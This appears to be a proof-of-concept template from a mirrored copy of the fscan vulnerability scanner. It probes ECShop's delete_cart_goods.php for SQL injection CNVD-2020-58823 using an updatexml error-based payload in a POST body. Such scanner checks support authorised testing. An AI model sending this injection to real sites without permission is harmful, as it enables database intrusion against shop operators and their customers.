mirror of https://github.com/qwqdanchun/fscan.git
13 lines
433 B
YAML
13 lines
433 B
YAML
name: poc-yaml-ecshop-cnvd-2020-58823-sqli
|
|
set:
|
|
r1: randomInt(40000, 44800)
|
|
rules:
|
|
- method: POST
|
|
path: /delete_cart_goods.php
|
|
body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
|
|
detail:
|
|
author: 凉风(http://webkiller.cn/)
|
|
links:
|
|
- https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw |